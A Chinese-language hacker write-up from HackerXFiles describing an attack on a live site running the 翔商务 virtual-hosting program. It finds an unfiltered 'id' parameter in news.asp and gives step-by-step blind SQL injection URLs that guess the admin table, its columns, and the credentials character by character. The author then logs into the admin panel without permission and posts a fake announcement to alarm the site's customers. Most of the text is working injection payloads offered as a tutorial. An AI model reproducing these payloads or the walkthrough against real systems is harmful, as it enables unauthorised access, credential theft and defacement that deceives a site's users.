信息来源:HackerXFiles
文章作者:沧海(chu002)
一,广告.
中国脚本安全联盟 是由沧海一个人组织的一个收集脚本资料的站,目的是给大家提供 比较全面点的脚本资料,希望大家支持下,本站继续招收脚本研究人员.联系:QQ.41481759 说明:CSSU
二:测试开始
今天晚上一朋友由于要做个卖空间的服务器希望我帮着找个好点的程序,.我就拉了翔商务虚拟主机程序下来看了哈.
由于还比较喜欢脚本,先看下程序.我从后面开始看,没发现啥!呵呵,打开news.asp
<% rs.movenext
wend
rs.close
id=request("id")
if id="" then
sql="select * from news where ll='首页新闻'"
else
sql="select * from news where ll='首页新闻' and id="&id
end if
rs.open sql,conn,2,3
%>
呵呵,看见了没出现傻瓜程序了.好象没过滤字符哦.
有的搞了.晕,网络断开,已经2点了.由于湖南下了点小雪,天气还比较的冷,快睡觉ing....手冷死了.
三.第二天,继续开始.
开工咯.
1.首先还是从猜表名开始吧!
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select id from admin)呵呵,顺利没出现任何错误.看来是存在admin这个表咯
2.猜管理字段名
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select top 1 Count(*) From admin where len(username)>0)返回
对不起,,,你所访问的文件以经被删除了。。。
顺便解释下,上面的那句话,
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select top 1 Count(*) From admin where len(username)>0)是查询admin表中是不是有username这个字段,
看来错误了.把username改成userid.呵呵,这次可是成功返回文章了.
3,猜userid的长度
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select top 1 Count(*) From admin where len(userid)=5)成功返回
这个时候其实可以运用下社会工程学嘛!瞧5个字的admin不就是5个吗?
还是猜下啦!给刚接触这个东西的朋友看下.
猜管理名的第一个字符
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select min(id) from admin where mid(userid,1,1)='a')
猜管理名的第二个字符
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select min(id) from admin where mid(userid,2,1)='d')
就这样一直猜下去,
4.管理字段名猜到了.下面来猜管理密码字段名
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select top 1 Count(*) From admin where len(password)>0)
成功,继续加油猜密码的长度
猜password 的长度
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select top 1 Count(*) From admin where len(passworvd)=5)这个是我的一个习惯,先猜傻瓜密码admin.返回成功,
顺便给出怎么猜密码的第一个字符
http://www.xxxxxxx.com/news.asp?id=52 and 1=(select min(id) from admin where mid(password,1,1)='a')
猜密码的第二个字符也是一样把前面那个1换成2就OK.
全部猜出了
ID是:admin
密码是:admin
http://www.xxxxxxx.com/admin.asp进去看哈,呵呵,可爱的管理页面出来了.加了条新闻,
"由于本站严重亏损,所以停止一切空间申请,请申请了的朋友和我们联系,我们将以双倍的价格回收."哈哈,吓死他们.
到现在为止一切完成.希望大家一起来到
http://chu2002.103.cn
交流下
